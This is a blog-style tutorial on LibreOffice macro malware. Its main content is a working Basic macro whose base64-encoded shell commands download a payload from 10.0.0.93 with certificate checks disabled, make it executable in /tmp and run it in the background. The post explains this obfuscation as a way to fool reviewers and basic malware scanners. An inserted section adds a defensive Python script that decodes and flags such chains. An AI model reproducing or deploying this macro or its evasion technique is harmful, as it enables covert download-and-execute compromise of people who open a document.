A bit of fun with base64-encoded macros in Libreoffice. Read the Libreoffice macros post first to get the basics of macro-based malware :)

So, first, why on earth would we encode our strings in base64? Hopefully to fool anyone looking at the macro, or the most basic malware scanning engines.
The trouble is that we can't be sure a base64 decoder is present on the target system, so sometimes this approach will fail and we have to revert to the basic one, without obfuscation.
But, let's look at how to throw some base64 strings into a macro, shall we :)

Sub Main
Shell "bash -c 'echo d2dldCBodHRwczovLzEwLjAuMC45My9wYXlsb2Fkcy9QT1BVTEFSX1RST1VUIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgLU8gL3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash'"
wait 10000
Shell "bash -c 'echo Y2htb2QgK3ggL3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash'"
Shell "bash -c 'echo L3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash &'"
End Sub

There are a couple of components to all this, so let's go through them one by one. First, how do we encode and decode base64 in Linux?

echo "this is a test" | base64
dGhpcyBpcyBhIHRlc3QK

We use the echo command, followed by the input in " ", and last we pipe it through to the base64 encoder.

echo "dGhpcyBpcyBhIHRlc3QK" | base64 -d
this is a test

And we decode it again with the -d option to base64.

So, all our commands can be obfuscated with base64 and decoded before execution. Now, there's one problem. When we pipe it to base64 -d, it only decodes; it doesn't execute anything in bash. For that we have to add one last pipe, this time to bash itself.

Shell "bash -c 'echo Y2htb2QgK3ggL3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash'"
Shell "bash -c 'echo L3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash &'"

These two lines show that.
In line one, we tell Libreoffice to run bash with a command, using -c. Inside that command, echo prints the base64 string, we pipe it into base64 -d to decode it back to the original text, and finally we pipe the decoded text through to bash for execution.

Line two is the same, except that we end with a & to send the last bash process to the background, so it keeps running if we quit Libreoffice.

I know it doesn't protect against seeing what servers it downloads from; that is simply copying the base64 input string and piping it to base64 -d to get the original output, so it's obfuscation, NOT encryption ;)
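As an added illustration of that last point (example code written for this page, not part of the original post or of Libreoffice): a small Python triage script that pulls every echo | base64 -d | bash chain out of macro source, decodes the blobs, and tags the recovered commands with a few defender-side heuristics. The sample macro text is a constructed copy of the three Shell lines above; the regex and the indicator tags are my own assumptions, not any scanner's actual rules.

```python
import base64
import binascii
import re

# Constructed sample: the three Shell lines of the macro above, as a scanner
# would see them after extracting the Basic module from the document.
SAMPLE_MACRO = """Sub Main
Shell "bash -c 'echo d2dldCBodHRwczovLzEwLjAuMC45My9wYXlsb2Fkcy9QT1BVTEFSX1RST1VUIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgLU8gL3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash'"
wait 10000
Shell "bash -c 'echo Y2htb2QgK3ggL3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash'"
Shell "bash -c 'echo L3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash &'"
End Sub
"""

# Assumed pattern: "echo <blob> | base64 -d | <shell>" with an optional trailing "&".
B64_PIPE = re.compile(
    r"echo\s+[\"']?(?P<blob>[A-Za-z0-9+/]+={0,2})[\"']?\s*\|\s*base64\s+"
    r"(?:-d|--decode)\s*\|\s*(?P<shell>\S*?(?:bash|sh))\b(?P<bg>\s*&)?"
)

# Assumed heuristics applied to each decoded command: (tag, pattern) pairs.
INDICATORS = [
    ("network download", re.compile(r"\b(?:wget|curl)\b")),
    ("tls verification disabled", re.compile(r"--no-check-certificate|(?<!\w)-k\b|--insecure")),
    ("writes to /tmp", re.compile(r"\s-[oO]\s+/tmp/|>\s*/tmp/")),
    ("marks file executable", re.compile(r"\bchmod\s+\+x\b")),
    ("executes from /tmp", re.compile(r"^\s*/tmp/\S+")),
]

def decode_b64_payloads(macro_text):
    """Return (line_no, decoded_command, backgrounded) for every echo|base64 -d|shell
    chain; blobs that are not valid base64 are skipped rather than crashing the scan."""
    findings = []
    for line_no, line in enumerate(macro_text.splitlines(), start=1):
        for m in B64_PIPE.finditer(line):
            try:
                raw = base64.b64decode(m.group("blob"), validate=True)
            except (binascii.Error, ValueError):
                continue  # junk or truncated blob: report nothing for it
            cmd = raw.decode("utf-8", errors="replace").strip()
            findings.append((line_no, cmd, m.group("bg") is not None))
    return findings

def indicators_for(command):
    """Tag a decoded command with every heuristic it trips, in INDICATORS order."""
    return [tag for tag, pat in INDICATORS if pat.search(command)]

if __name__ == "__main__":
    for line_no, cmd, bg in decode_b64_payloads(SAMPLE_MACRO):
        print(f"line {line_no}: {cmd!r}{' (backgrounded)' if bg else ''} -> {indicators_for(cmd) or ['none']}")
```

Running it against the sample prints the three plaintext commands, which is exactly why a string-level scanner should decode before matching rather than trusting the encoded form.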

Now, if my theory is correct, we could make this a one-liner, instead of doing each input on a new line. I will have to try that, and will post it here as an edit when that's done :)

Happy hacking ;)


You have no rights to post comments